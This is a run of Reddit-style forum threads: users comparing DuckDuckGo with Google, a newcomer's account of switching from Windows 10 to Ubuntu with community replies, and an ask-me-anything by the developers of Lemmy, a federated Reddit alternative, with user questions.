Yes I do. It gets the job done and  is less invasive of privacy. I use DDG by default for every search except maps. 
Yes, for all but technical searches.
I still use everything Google. Then again, I have Windows 10 as a VM with the nice and shiny VFIO so that it can be just like Windows but without any BSODs related to CPU or RAM issues, that's taken care of Linux, as Windows would be like "oh noez hardware error (BSOD LOOP)"
I tried DDG but switched to ixQuick.com.
No. DDG has been useless every time I've tried it. I use Google first, and if I fail there, I usually find success with Bing. 
I made the switch a few months ago when I finally realized how much info google is collecting on me via my searches at home/work/mobile. DDG works just as well in my experience, and without any caveats.
Yes it's my default
It's the search engine that displays the best with w3m
What drove me away from Google the most, was "Google Instant", the feature that searches as you type. It caused havoc with screen readers. With a screen reader, you press "h" to jump to the next heading, and if you did that with Google Instant, it would search for an extra "h".

GI was a really dumb feature, I'm glad Google finally saw the light and got rid of it.
My default search engines is set to DDG, however it fails on finding local things, in that case I have Google in my keyboard shortcut
It is also great for porn.
If you put g! at the end of your search query in duck duck go it will search using Google
Yes. It's not SEOed to hell nearly as much as Google is these days.
I used DuckDuckGo for about 6 months. DDG was fine for me except when I was searching anything technical. When I was doing programming-related stuff, I had to switch to Google for about *every second search.* DDG is fine for common stuff or stackoverflow, but can't find anything obscure.

I'm back using Google. DDG can't compete. The only downside to using Google is that it tries to hard to be "smart", so you sometimes have to put some words in quotes.
> Don't be evil. `--Evil`

-

> They are evil. `--Duckduckgo`

That helped me.
Yes, I use it everyday. If I need to fallback to google I use !g but I really like that i can search wikipedia github and other sites from one interface.
I use it 99 percent of the time. The other 1 percent is google (it doesn't alwayd work in that 1 percent).  I don't like being tracked.
A fair amount of Linux users prefer not to be tracked on the internet, and if you even remotely support this cause, DDG is a great choice.

Even when the results aren't satisfying (which happens, but not that often), you can use bangs: simply add !g at the end of your query and the Google results will be shown.

Bangs also allows to search directly Wikipedia in any language (!w for English or !wfr, !wbr for French, Portuguese etc), same with Google (!gfr...) and a bunch of other services. Definitely my favorite feature, along with displaying directly a relevent Stack Overflow answer when searching about that sort of thing. 
https://www.startpage.com

It's my default but I use Google for any real sleuthing.
I prefer neither. But since I have my own SearX instance, I usually always get the results of both search engines. Sometimes Google wins and sometimes DuckDuckGo.
google is still the best when it comes to recent searches. But most of the time the results are 90% similar between the two search engines. So I use ddg by default but sometimes add a !g if I think there is more to be found.
No.
Why not both?
But if porn is your thing than apparently BING is for you! 
I tried to move to ddg from google, but I ended up switching back. Ddg didn't give me time-relevant information at the top like google does, nor did it have an option to filter results by time. The instant results are great for programming, though
Absolutely not. I like that Google knows me and can anticipate what I'm looking for. Saves me a ton of time.
No, I'm not a fan of cutting off your nose to spite your face.
Been using Google search. 99.899% I found great results. 

The other 2% I'll go to other search engines. Yahoo and DuckDuckGo would be a few of them. 

My Mega Search Engines  I been using Dogpile.
[deleted]
yes, its easier to theme to match my desktop colours. thats literally the only reason i use it over google.

if there is a difference in result accuracy i can't tell.

i first tried it years ago but it wasn't accurate so i stopped, tried it again there the end of 2015 i think and have been using it since on everything. since changing back the 2nd time, every search since has yielded what i want on the first page. i dont use the advanced features although they seem nice.


No. I would like to, but I don‘t get how all of these google backed search engines fail returning anything relevant in the top 3 results 9/10 times. Google itself is the only one reliably finding what I am looking for.
US services cannot be trusted at all.
I use metager, a privacy focused non corporation based in Germany: https://metager.de/en/about

https://metager.de/en/

[deleted]
Yes, DDG is the default.
No. I just use google. But I miss lycos and alta vista sometimes not sure why
Just for privacy I prefer duck duck go, though ill freely admit I pop open Google if I can't find what I'm looking for.
I have ddg as my default search engine, but more times than not I'm using it as "something to search g!", which takes you to google

In my experience  ddg simple doesn't find the relevant information quickly enough 
DuckDuckGo works fairly well for me. The UX and the features is way way better than any other alternative though.
DDG is worse than Bing and that’s not saying much.
> I've observed that most of the advance user prefer DuckDuckGo

That is wrong. The only reasons to prefer DuckDuckGo over google are privacy related, nothing else, nothing more.

The results returned by DuckDuckGo are not better than google. They are not bad either, so they are certainly a viable alternative. 

Over the past few  years, I've been using Windows 10 and while I do enjoy using it, lately I've been feeling that there is something about it which makes it seem as if it does not have any personality of its own ? Everything felt very superficial, inconsistent. It felt almost as if someone else was in control of my computer, automatically managing my updates, preferences, and apps that I install onto my system. 

Over the years of using Windows 10, I grew accustomed of these inconveniences. 

1.) There were instances where Windows would update automatically and install a load of bloatware (stupid games from their Windows store) onto my PC without my permission.

2.)  After almost every major update, my preferences would automatically reset or change to something else entirely. 

3.) I grew accustomed of random freezes and memory leaks. 

4.) I grew accustomed of Windows Defender scanning my PC 10 times a day even after having it disabled. 

5.) Considering how rare privacy is these days, I felt like Windows was not being respectful enough. Disabling Cortana still keeps it running, even though it doesn't show up in Task Manager. 

It was not just about inconveniences either. As someone who is interested in the workings of a computer, I just couldn't learn/tinker much in Windows. Because it is mostly a GUI based system, you don't get to see what is actually happening under the hood. At the end of the day, all you are left with is the same OS, with the same interface, with no insights. I'm not hating on it, but learning opportunities are simply not there. With Windows 10, they made it even more difficult to actually see the workings of your PC. 

Last month, I finally decided to do something about it and switched over to Ubuntu. To be honest, it was overwhelming, considering how open it was to its users. Initially I was sticking with the GUI as much as possible because old habits die hard but eventually as I spent more and more time with the OS, understood the workings of CLI and Bash, I started to appreciate it more and more. As I was understanding the workings of the CLI, I was subconsciously learning. Problems that I were easily solved with a quick search, and following the instructions which mostly involved using the CLI. It turns out, using CLI is far more productive than messing around with the GUI, as it gets the job done without having to move through menus and windows. 

I loved the transperancy that I had with Ubuntu in general. I could easily monitor what data was being sent from my PC, and data was being received. I could actually disable the things that I didn't want, and they'd stay the same even after updating the system. It hasn't yet crashed/froze on me yet, as I keep my system turned on for the majority of the day. 

After years of going through subdued inconveniences, I finally feel as if I have some degree of control over my PC. There is still lots to learn, and I know that I will mess some things up far more than I could count right now, but I am just glad that owning your PC actually feels like owning your PC. You don't have to jump through hoops to do what you should be able to do right away. 

On a closing note, I want to thank everyone who is a part of this community for helping me out when I had my doubts/questions. It is probably one of the most endearing community that I've been a part of, where everyone is trying their best to help out others, rookies and pros alike. If it wasn't for the support and the troubleshooting tips that I've had over the past month, I would have probably given up.
Welcome aboard. One advice from one stranger to another. Avoid tribalism at all cost, and enjoy whatever works for you, because you WILL ~~meat~~ meet those people.
Congrats and welcome.  I just passed my one year anniversary of downloading Linux for the first time.  Frankly, I downloaded Mint in a fit of pique after Microsoft pissed me off.  I had no desire to learn to code or anything like that.  I was just angry and didn't want to pay them a second time for a system I'd already purchased.  So I went, "Linux is free, so screw you.  I'm downloading Linux."  

I bought a POS laptop from China because I needed a computer and didn't have a lot of money.  I knew it was a POS, but frankly I pretty much only use it to write fanfic and surf the internet, so I didn't need it to do much.  It was slow as molasses and had a crap battery life and lousy speakers and the fan ran constantly because it was always on the borderline of overheating.  It came with Windows 10, which I didn't like.  Windows had become less customizable with each generation and that annoyed me.  But like I said, I don't use it for much, so I could deal.

But then I downloaded Linux and suddenly my piece of crap wasn't so crappy anymore.  My battery lasts for six hours now, eight if the wifi is turned off, instead of the two hours I got running Windows.  It's plenty fast enough to do everything I need and I haven't heard the fan run once in over a year now.  Even my speakers are at least fifty percent louder than they were running Windows, which is weird af.

I still have to look up a tutorial every time I want to install a program or game.  I don't know if I'll ever just be able to *use* terminal without looking up a help guide for whatever I need to do.  But there's a help guide online for basically everything and they're really easy to find.  And I read forums like this one often enough to know that if I ever run into trouble I can't find an easy answer for, I only have to post the question and someone will have an answer for me in about a minute flat.

Linux users in general are way more knowledgeable and helpful than any Windows community, in my experience.  The community is fantastic and I love you all.  I still don't understand ninety percent of what y'all are talking about, but I love it anyway.

So, welcome, OP.  I, for one, am glad to have you and I look forward to your contributions, no matter how much or how little I will understand them.  ;-)
I've been wanting to switch to linux for a while, i'm glad to hear that you've found a comfortable place in Linux
Glad for you, seriously. I've been on Linux for lots of years. Ubuntu is a great choice. You should be able to do some gaming on there too.

If you like knowing more about your OS, Debian is also a great choice once you got the hang of Ubuntu. I use Debian on desktop and Ubuntu for laptops. With debian I feel I have more control of the system at the expense of some extra fiddling required. But Debian can be stripped down to almost nothing. Ubuntu comes with easier driver installations and detection so it's best for WiFi cards and other weird laptop stuff.

Whatever the distro, try to stay away from windows as much as possible. Prefer wine to VirtualBox, and VirtualBox is still better than dual boot.
Welcome home
That feeling of freedom and control is well worth the annoyances you might meet along the way, even though they get fewer every year.
Have fun!
Excellent post! I was introduced to Linux about four years ago when I started my computer science degree, I found it was a lot easier than (a) beating my PC into submission just to write some basic code or (b) locking myself in the computer lab in order to get things done. Since then, my laptop has been some flavor of Linux.

The thing that has me most excited is Valve's pledge to make "every game on Steam" work with their Steam Deck by the end of 2021. The Steam Deck, for those unaware, runs SteamOS which is built on top of Arch (previously Debian). So, really what Valve is saying is by the end of 2021, they want to make every game on Steam playable on Linux. 

This should turn some heads, especially considering a fair number of people stick to Windows solely for gaming. If Valve makes good on their pledge, it's a fair bet that I will ditch Windows entirely and make my main PC a Linux machine.
Long live linux mint
Excellent! I made the switch to Ubuntu a year or so ago after Windows decided to update without my permission and then brick itself. What absolute trash that UX was. I've since customized the hell out of my Ubuntu system and I'm running KDE, couldn't be happier. Runs everything I need, even plays all the Steam games I care about at native speeds! I'm never, ever going back to Windows on my daily driver. Everyday I read about something else happening to Windows that confirms that it was the right choice.
Welcome home Chad :D
Congratulations. If you're reasonbly techy and willing to learn this will be a great thing for you. Plus, now you can sit at The Cool Kids' table.
TL;DR I was running Windows 10 with concerns about privacy and some malfunctioning. I switched to Ubuntu, I got acquainted to the CLI and appreciated it, I've the pleasant feeling to be on control of my smoothly working  PC. Thank you to the Linux community for the support.


Welcome and congratulations! 

Besides, if you asked for support in here you broke rule n. 1. [Askubuntu](https://askubuntu.com/) is the right place to ask for Ubuntu support.
>It turns out, using CLI is far more productive than messing around withthe GUI, as it gets the job done without having to move through menusand windows.

Amen to that.

Linux user since my teenage around 2000, initially studying law, maybe that helped, maybe not, but I fell in love with how many HOURS I spared in a matter of weeks by just investing a dozen hours understanding the basics.

Now that I work in IT after (very) progressive reconversion, I am just a bit more experienced with bash. And while I hate it for making "programs" (it's not designed for that though so I know it's on me) I just love how the twenty basic commands you learn in any Linux sysadmin lessons change your quality of life.

Just du, find, grep, sed, ps at basic understanding wield great power combined with piping and input/output redirections. I cannot imagine what true sysadmins can do. XD

And beyond that, having made the leap after a(nother) Windows XP crash, I've been on a cloud of serenity being finally freed from virus menaces (just don't do stupid things with root), incredible unstability, chore of reinstalling from scratch every 2 years (losing every user pref in the process) and so forth...

Investing in Windows is like renting: it may be practical but it's a sink: very little of what you "pay" now will return on investment because Windows evolves pursuing MS interests first and foremost, usually very different from yours (confer the barely disguised hardware racket of Vista requiring high end to be barely usable, confer the Windows 8 UI cataclysm that got force fed to users. Such things would, or rather, could never fly in Linux ecosystem).

Investing in Linux is like investing capital in buying property and supervising building: lots to learn, but the more you know the more you understand about your home and can tune it yourself, and all that knowledge stands strong through the years for many reasons (one being nobody forces you to ever upgrade to new system/interface, one being people that don't like forced change can fork to maintain current state, etc).
Really happy to hear this! Are you still using Ubuntu?
So this is funny. Every nerd I talk to will recommend EVERYTHING EXCEPT UBUNTU. I love it because it has the biggest community space WHICH MEANT better support. And the GUI was the more advanced and user friendly. I really don’t get why there’s so much hate with Ubuntu, it just gets the job done and then some
Welcome to the light side of computing.
I always found myself dual booting and heading to windows more than my linux... until I too just got fed up with regular everdyay windows bullshit. I started with debian on my laptop but I felt like some drivers just didn't work very well out of the box... Then I tried ubuntu and it literally works as it should and like you say my settings don't change every update! I now strictly run linux on my laptop no dual boot and I have a windows VM for when I need it. The only windows machine I still have is my gaming PC for obvious reasons <3
Same here, I started with Ubuntu, then Arch then Fedora, Tumbleweed, Debian, Fedora. Almost every software I use is TUI - Neovim, bpytop, Vifm, mpv, imv, pass. Except Firefox.

Just recently I switched to Sway from GNOME. GNOME was great, but I wanted to try something different. Sway gave me a LOT more control over my system, and now I finally feel complete (Although I do think my init.lua could be improved).

Linux is beyond Awesome! Open source ecosystem is awesome! And now even a thought of using Windows just sucks the happiness out of me. Like no fucking way!
There are a ton of things that are simply better or faster on the command line. For example, opening up Konsole and running

`sudo apt update`

`sudo apt upgrade`

is just faster than opening Synaptic or Discover. Discover lets me know when something's available for update with a tray icon but it's still faster on the CL than waiting for a GUI.

Same thing with my VPN, connecting and changing exit nodes is faster on the CL than opening the GUI.

As you noticed, most Linux distros aren't total dicks about updates either; you generally just get a small icon on the tray letting you know there are some available. Linux machines also generally have a lot more uptime than Windows does, so there's more incentive to tighten up the code to make sure that doesn't happen. After all, if you know that a Windows box is going to have to be update frequently and always involves a restart, what's the incentive to make sure there are no leaks? Linux in the server space is up for months at a time sometimes, and generally don't even need a restart once done. The lack of telemetry is also big these days.

Plus, I just like it better. The interface on Windows is disjointed and wooden. If I don't like one desktop on Linux I can just install and try another.
[deleted]
I’ve been wanting to switch to Linux full time for months but so much stuff like oculus vr and a lot of games with anti cheats just don’t work on Linux. I can’t wait for these problems to finally get sorted out by the end of the year tho, for now I’m gonna have to use a debloated windows 10 which honestly works good. Just goes to show how windows 10 could be a fantastic os if Microsoft didn’t slow it down with the garbage they slap onto it
Welcome to the gang! Contrary to some floating beliefs from the days of old, the community is incredibly helpful if you run into any trouble. There’s also the [arch wiki](https://wiki.archlinux.org/) which is incredibly useful, even on non-arch distros. 

If you don’t mind me asking, which flavor of Ubuntu did you go with?
>3.) I grew accustomed of random freezes and memory leaks.

For me the same thing that had happened on Windows is happening on Arch Linux as well, at least only one program freezes instead of the entire OS. Guess Orico USB3.0 VL805-based expanders are still experimental.
Welcome to the club, I personally started on Unix then swapped very early to Windows and stuck to it for much too long. I've been running CentOS for years now.
I'm really happy you're enjoying your time in Linux and that you have now the control of your PC
Great Post. thank you.
[deleted]
I am glad you are enjoying your computer again. Its a great adventure. +1
Welcome onboard! Hope you have a great time!  
Also - I would recommend installing a VM and trying out other distributions aswell to see if there are other environments that you like even more.  
I personally really enjoyed KDE and (even though probably not very beginner friendly) Manjaro because of the package manager pacman and the AUR.  
But don't let anyone tell you what distribution to use or which distro is "bad" in their eyes.
Congrats and welcome home!

Another 'fun' part that you will come to know is that the more familiar & confident you get in the Terminal the more risks you'll be willing to take and the more likely you will be to crash it.

Knowing the commands is great! Knowing the right command for the task at hand... takes practice.

Remember to make backups, on a regular basis. They can save you a lot of time & frustration getting back to where you left off.
It did for me too. Been using Linux for 16 years now.
This and the horrendous start search. I got sick of Windows completely and just wanted something that I have control over. I've got a Mac for when I just need to get work done. Currently running Ubuntu 21.04 and I've been thinking of switching to Fedora.
I love being able to load up witcher 3 in lutris in 3 seconds but on windows 10 it takes 40 seconds... Linux is so lightweight and fast that nothing can compete with it. Its just so damn well coded and put together I love it.
On another note, I frickin love Linux but playing Halo 3 on Pc and using iTunes, I can’t make the plunge to go fully into Linux :(
Plenty of breedables in the comments tonight
Hi!

I have never read such an exact and detailed comment about someone discovering the goodies as a new opensource user!

I agree with you 400% I feel exactly the same! Thank you for your comment!
Dunno about you, but linux made more problems for me, though i don't use it half year already. Linux made me always checking system, monitoring everything, spending whole day in configs, now cuz of that i can't use computer calmly like usual people. Also i still have habit from tiling WM's shortcuts, still on windows i press them and don't get why doesn't it work
I have gone in the opposite direction.  I got sick of tinkering with the desktop environment to get it to do what I wanted.  I have found Windows to be much easier to configure and maintain than Linux, and the range of software and utilities available are far superior to Linux.

I suppose this brands me as an incompetent dolt, but I think that the current state of the linux desktop is where windows was with XP, but without the plug and play hardware compatibility.
Buy a cheap PC; install arch Linux; profit

orrr buy a cheap PC; install arch Linux and use it as secondary monitor; profit

&#x200B;

&#x200B;

&#x200B;

edit: I use arch btw
It's all nice and dandy until Canonical makes Ubuntu desktop search phone to Amazon, returning Amazon search results (this has happened before, you can google it), push their proprietary Snap store (the server part is closed source, so there is only a single store, you can't run your own instance like you can with Flatpak, and apps must be approved by Canonical) and things like these. 

While Ubuntu is (was?) a great starting distro, it's basically Windows of the Linux world, so please continue in your journey of exploring freedom and try out various other distros too. Check what policies and rules distros have, who is behind the distros and if they have some kind of agenda to push unnecessary stuff on the users in their own interest, etc. Though if you are happy with Ubuntu, then I guess that's fine too, as long as you are aware of its shortcomings.
[deleted]
.
Ubuntu has been my main driver for 5+ years. I've never looked back. Games work, development is easier in some aspects and freedom. I actually felt similar to you, but  I'm an Apple/Nix user and my love for Windows have evaporated long ago.
I'm using it on my laptop and I'm using deepin and damn it's pretty and with wine installed it's amazing
Awesome
Glad to hear you've had a positive experience on Linux.

I feel a bit of the same about using the command line and a bit more control over the machine.

I've found some tools to be of great use aside from the package management. 

Using htop or bpytop to view system processes has been helpful, along with pstree to monitor system behaviour. Not to mention the apparent lack of installed software that I've never asked for on Windows.

Good on ya for giving it a shot.
Congrats! I just switched about a week ago from Windows to Fedora. I haven't looked back. I can play all my games in using wine or steam, there are plenty of apps that are good quality and solid, and I completely control my machine. I love it.
I switched recently too. Tried it in the past but something always annoyed the sh\*\*t out of me and i switched back to windows. This time its definitely different than before. I can play GTA:SA on Steam, all applications i need are available or have 1:1  alternatives that does the same job (softmaker office instead MS Office for example). I enjoy having control back over my system.
I finally got an actually decent PC after a year or so of running an HP Stream with Pop!\_OS. It came with Windows 7 originally, it's kinda old and I got it from my old school when they upgraded their old teacher's desktops. I free upgraded to 10, and I've just been using that as my main OS. I've missed getting to run the Terminal and just tinkering with my OS, so I'm loading up a 64GB flashdrive with Ventoy and a bunch of different .iso's to see what can run on a 15+ year old laptop, and to finally give new purpose to another old laptop I have laying around.

Windows kinda sucks, but I actually suffer from less issues than you. I don't get the weird bloatware, Windows Update works fine, and so far I haven't experienced memory or freezing issues. 

So far, my only issue has been my monitor, because it's broken. I guess I'm one of the 50/50 bois, where I find pros and cons in both Windows and Linux. I'll probably be a dual-booter in the future, once I manage to get more than a 500GB mechanical hard drive for a boot drive.
It's amazing how stable Linux is now. I can set up a mod loader and have my Skyrim game running stable with 100 mods and I don't even have to tinker with anything.
Hey OP! Congrats! Just curious, what tasks got you using CLI more? I’ve spent about 2 years with Linux, but use the GUI for probably 85% of tasks. I’m looking to become more familiar with command line.

Edit: I mainly use the terminal to update, upgrade, or backup with timeshift.
Does anyone here have a favorite app that's the Linux equivalent of everything.exe (voidtools)?  Or is searching for files that fast already easier on Linux?
I’d love to switch but I can’t play games with anticheat.
This is an interesting story for me, thank you so much for sharing.

I was always sceptical about DOS and Windows, from the beginning I preferred more convincing systems, which never caught on in the market. Geoworks, S.u.S.E., OS/2, BeOS...

Finally I stayed with Linux. In its time, this was still associated with real pain, the modern systems are no comparison. In the last twenty years, Linux-based distributions have made a huge leap. Whereas once basic functions were lacking and supported hardware had to be found explicitly, not to mention peripheral devices, a current Linux is even fundamentally more capable than Windows (my current PC doesn't run Windows at all because three of the required drivers shoot each other down and produce a blue screen - MS does not care, Developers do not care).

I always wondered how Windows users saw this. Thank you for your text.
I agree with most of what you said.

One pain point for me when making the switch though (on my work computer) is how badly Linux handles (or rather, fails doing so) out of memory situations.

While windows would start killing apps to try and give you back control of the system, on Linux everything froze for a couple of minutes before I could actually move my cursor again.

I understand that some OOM killer needs to be configured (and installed first?), but I'm quite surprised that this isn't part of the core of the OS.
Ubuntu is OK may I suggest Linux Mint or Arco Linux? Mint gives more freedom and Arco Linux gives you more power.
I feel like people hate on Windows for fun, I don’t often find people that hate Windows/Microsoft in my field, I basically use ever operating system and because I had to
I remember setting up my computer to dual boot Windows and Linux and just thinking about the hassle of booting Windows, dealing with the updates, rebooting again and let's face it, probably again for some reason, I just couldn't be bothered and never did it. 

Eventually I upgraded my PC and found Windows 7 wouldn't even boot anymore at all and just didn't care. Goodbye Windows!
I’ve tried to switch to linux twice on a razer blade stealth 13” 2016 model and between not being able to press caps lock or close the lid without it freezing and needing to reboot I haven’t been able to make it work. I accidentally wiped it twice, I just need to completely erase windows and deal with linux on bare metal.
Mate. If bloatware bothers you, jump into the deep end, install arch and see how long it takes you to miss it.
Glad to hear that! :)
I left Windows at XP.  I know the PC is just a tool.  I switched to Linux over 17 years ago and the fun has never faded.   😀
That is exactly how I feel about Windows and Linux.
Linux is an abusive relationship. She's beaten me into submission. I can't use anything else, no matter how much it hurts.
This quote "using CLI is far more productive than messing around with the GUI, as it gets the job done without having to move through menus and windows."

I so true, I am amazed by the fact that many people think they understand the OS better or that it easier to use since the can find every option in some menu. I often hear the "complain, I cant't remember the command line options by heart", IMHO it is much faster to check the man page of the command in question, usually it also has an explanation, and check the right one than search through menus. Unless of course you spend your memory to memorize the menus and the locations in the menus instead. Maybe it is due to the missing help system, at least usable one, on windows?
We (u/parentis_shotgun and u/nutomic) are the devs behind [Lemmy](https://github.com/LemmyNet/lemmy), an open source, live-updating alternative to reddit. Check out our demo instance at https://lemmy.ml/!

Federation test instances:

- https://enterprise.lemmy.ml
- https://voyager.lemmy.ml
- https://ds9.lemmy.ml

We've also [posted this thread over there if you'd rather try it out and ask questions there too.](https://lemmy.ml/post/33644)

Features include open mod logs, federation with the fediverse, easier deploys with Docker, and written in rust w/ actix + diesel, and typescript w/ inferno.
A little more info: 

We're a team of two open-source developers, and for the past year or so we've created an easily self-hostable Reddit alternative called Lemmy, intended to work in the fediverse alongside mastodon, pleroma, plume, and other fediverse projects. 

The fediverse is sorely lacking a federated link aggregator, as well as communities and discussion built around links.

The ability for anyone to host a link aggregator, and build federated communities outside of the largest centralized services, and particularly outside of the jurisdiction of US-based companies like Reddit, has large implications for media sharing and online discussion. 

We also want to do our best to end the dominance of English in link aggregators, so we have [~20 languages currently supported](https://weblate.yerbamate.dev/projects/lemmy/), and plan to have supported languages as a user setting, so that eventually a single community can be multi-lingual.

The project has an [AGPL license](https://github.com/LemmyNet/lemmy/blob/master/LICENSE), and we've wanted to avoid funding sources that would require us to privatize the project, as this goes against our principles. We want to be funded only through our [patreon](https://www.patreon.com/dessalines), [liberapay](https://liberapay.com/Lemmy/), and any grants and open source initiatives that could help. We feel that all software should be communally developed, and benefit humanity, not a small number of company owners. As such we will never have ads, or any privacy-offending technology.

We also have an open [HTTP and Websocket API](https://dev.lemmy.ml/docs/contributing_websocket_http_api.html), so that applications and research projects could easily be built around it.

The current front and back end are very performant, using Rust, Actix, Diesel, Postgres, Typescript, and Inferno.
1. How is federation with other Fediverse platforms handled? For example, how would a Mastodon post appear on Lemmy and vice-versa?

2. Besides being federated, what advantages does this have over Reddit?

Seems like an interesting addition to Fedi, I hope it succeeds.
It's 341k for the main JS file, and almost 2mb for the home page load which seems a bit heavy.  Also, I'm afraid search engines also aren't going to do well with this site. It would also be nice to have group names in the post URLs (semantic web).
I'm not sure the client framework is a good choice, but I do love the federated concept!  Thanks for working on this.
I don't mean to be impatient, but I'm kinda excited about this project.

Is there an ETA of when we can expect federation to be fully ready and supported?
Are you planning prerendering? It is currently invisible for search engine bots and social networks. [https://search.google.com/test/mobile-friendly?id=hp-nei0DECSls-f-WUiJ1w](https://search.google.com/test/mobile-friendly?id=hp-nei0DECSls-f-WUiJ1w)
What caused you to settle on Inferno over the typical framework choices like React and Vue?
Awesome thanks. 

Two sorely needed decentralised applications, a link aggregator and a social media platform. 

May web domination by centralised software services come to an abrupt end.
after federation gets merged, will you commit to a clear migration path for future releases? Meaning, will I be able to host an instance and upgrade without major issues? (not sure if this is already the case, just asking out of interest)
Would you be willing to add the features of RES natively? some of them are direly needed on lemmy, like keyboard navigation... I can't live without reddits keyboard navigation on the desktop and i'd gladly switch entirely if I could get it, expandos and all.
My friend's post in my community got removed because of "being edgy" how is this a problem? We were posting in our own community so I think it shouldn't be a problem and how do we make it so our posts don't get removed again?
Is there a way to switch to light theme, at least without registering? Is there one?

Also, https://dev.lemmy.ml/post/33644 link just times out for me.
That looks lovely.

I am unfortunately more of a lurker.

"live updating"?

Also, it took me 4-5 clicks to get to your github, maybe put that somewhere more prominent?
1. Are there plans to have a more production-y sounding instance than dev.lemmy.ml? I'd like to start using it and getting others to, too, but dev doesn't make it sound very solid. Also, the ml TLD adds to that effect a bit too. Basically, are there plans for a lemmy.org/com or something like that?

2. Why .ml?

3. Since it uses ActivityPub, are we able to do things like message Mastodon users from Lemmy?

4. Is Docker necessary to install it? If it's Rust I would have thought it could deployed as a single binary.

Great work! Lemmy is one of the most exciting projects I've been watching that uses Rust or ActivityPub.
* Will/Do you allow people to login with oauth providers you don't need yet another account?

* Will/Do you provider a reddit compatibile API so FOSS reddit apps can be ported to support lemmy? 

* The biggest thing keeping reddit alive is the network affect, how can Lemmy get past that?

* A few reddit clones have been made to cater for the alt-right and/or Cult45, how will Lemmy avoid becoming similar (or i guess what I mean is how will Lemmy remain usable for those that don't want that)?

* Moderation for large subreddits doesn't really work (too much power in the hands of too few, with no transparency), the federated approach of Lemmy seems like it will make this worse as essentially big subreddits will be on a single server, that the mods have even more control over, is this something that concerns you?

* Have you considered a distributed approach instead of a federated one? If so how do you deal with moderation?

edit: Also great project hope it goes well, just have a lot of questions.
.Are you interested in eventually making a Lemmy .onion address? What about making anonymous comments?
What do you think about Slashdot-style moderation? I find it much better than Reddit-style: in particular, it prevented brigading and allowed diversity of opinion. Basically, I'm very sad that Slashdot is almost dead, and while Reddit is a lot bigger with the subreddits and stuff, I feel that the upvote/downvote system is inferior to what Slashdot had.
Reddits gotten a bit too politically charged these last few years, and this site seems to turn that up to 11.

Like the tech tho, looking forward to hosting my own instance.
On patreon you make 120$ a month and on librepay 3.29$.

For anyone saying that you can make money with FOSS, please read those numbers again. Red Hat is the exception not the rule.

If the community wants more FOSS projects it needs to step up with financing! If you trully love open source, stop supporting youtube beggars, twitch thots etc and support FOSS projects!
I know you need to show it off to get users, but there's something oddly amusing about advertising a Reddit alternative on Reddit.
So would users of Lemmy be called "Lemmings"?  :)
How was your experience implementing ActivityPub? Did you just follow de spec o had to talk to the developers of the other projects to implement federation?
Cripes! The comments in here, pew!  It's a great idea and the notion that everything has to be perfect immediately is just silly. Especially the whole "cornflour blue" without a login crowd.  Fur frog snacks people! Use a browser plugin if it's that big a deal.

Love the idea, I also love the idea of Diaspora, even though that really didn't take off.  

Good luck!  Thanks for building something cool!
How do you plan to combat brigading/vote manipulation on the new platform? What stops someone from creating puppet accounts on a bunch of different instances and using them maliciously? Obviously it's a huge issue even for reddit, which has huge amounts of resources to throw at the problem.

Do you think federation will make this task easier or harder?
1.
From a fast read it's sound like a good thing, but how are you going to manage the costs? Are you sure you can live with only donations?

2.
Are you planning create a phone app for it? Even if Reddit is used by a lot of people from PCs, not having a phone app at the launch might result in a less appealing site.
It looks great! love the style. It's what the reddit redesign should have been.

reminds me of LBRY
honestly the fact that your dev spaces are blown up by antifa shilling is probably a no for me.
lol not distributed
Some of the features, like open modlog, won't work as intended once an instance or community becomes popular. Overall this project looks incredibly promising, though.
should make a way to link your reddti account so it duplicates the content is hard to compete against reddit
What are the system requirements for Lemmy?
[deleted]
Outside of software development, what are some of your hobbies/interests?
Is federating a central part of Lemmy or can a Lemmy server still be useful and fun to use without federation?
The moderation log is a nice idea. Was this a new idea or is there another platform that already did this?
How do you plan on generating money to support this important project? Looking at the GitHub it appears you need support. Working in big data for 4 years has taught me that it is very easy to *squish* efforts that go against brands. Ie. You are competing against some of the most powerful entities in the world. You will need staff with expertise that is quite expensive and hard to find which is the reason I left my startup we got squished by bad actors. How do you plan on generating revenue?
Would be nice to view the site without having JS enabled don't you think? Even reddit can do that much.
Allowing each server to set its own rules is a step in the right direction, but still wrong IMO. Have you considered removing those decisions from the server and passing them on to the user in the form of scripts?
Do you need any more Developers?
Any name changes in the pipeline? "Reddit" has quite a nice ring to it and is quite catchy too. Apart from that, the name is quite relevant to the site too. You can say things like, "I _read it_ on _Reddit_." "Lemmy" sounds very ambiguous and not that relevant to the site.
*Looks at front page* 

Great, Voat 2.0. 🙄 Hard pass.
signed up
Do you guys have obnoxious moderation?
I like the idea itself, but the main issue I can see with this and similar ideas \[like Diaspora, etc\] is that it's always in the shadow of a huge service, never really able to take the audience of the main service, so most people don't bother with using alternative as their main tool \[which is sad and I would like it to be otherwise\].  
One thing that could help here would be an API connection to the main service \[i.e Reddit, etc\], but of course Reddit would never allow it, as well as Facebook, or rather - they are switching API often just so that you can't integrate well enough.
This seems very cool, I have been thinking forever about making and open source reddit alternative in C using [ulfius](https://github.com/babelouest/ulfius) and maybe even some wasm. I recommend you don't use freenom domains as you have no legal ownership and they often take your domain away.
Definitely looks nicer than Reddit. Is Lemmy by any chance adding bridging support so it can actually pull from say, Reddit subreddits or other clones? So it can basically function as a personalised and unified self hosted news aggregrator?
One aspect of Reddit that I don’t like is how old posts are automatically archived. Is there a way to turn this off in Lemmy?
How does this compare to prismo?
Wow been some time since i checked Lemmy out, love the performance!

Would it be possible to have something like r/all? I honestly don't even know anymore how i found the first few subreddits to get the ball rolling and maybe there is a better way, but i think it would be good to have something like this to discover communities to join.
[deleted]
Try posting that on r/privacy they might like it.
I'm not really versed in webdev, but I just tried out one of the lemmy links, and holy shit is it **snappy**. I'm really impressed, good job!
Nice, it runs very smooth on my mobile, much better than real reddit.
how do you plan to live chat or video chat in the future ?
Just created a **new generalist instance** of Lemmy, [**Dixeet.com**](https://Dixeet.com). Thanks for your help and work, devs!
I don't really have any questions, but I do want to say it's a nice concept. Love how dark mode is default :)

Hope things go well for you!
Will v0.7 ever be released? -_-
Clicked link, checked it out. "Support your local Antifa"

*closes tab*

Never again. Good luck with your site.
Do you have any plans to prevent it from being taken over by all the people banned from other platforms?
Is it possible to require login to see a "subreddit" on Lemmy?
I just got perma-banned on /r/askscience for pointing out the data they used [here](https://www.reddit.com/r/askscience/comments/gvc7k9/black_lives_matter/) may not tell the whole story.  Apparently anyone pointing out inconsistancies are being perma-banned. I'm definitely open to a reddit alternative.
What is the business model? Who benefits, and how much?
I'm a bit late to this. But what are your plans to attract people to this new platform?

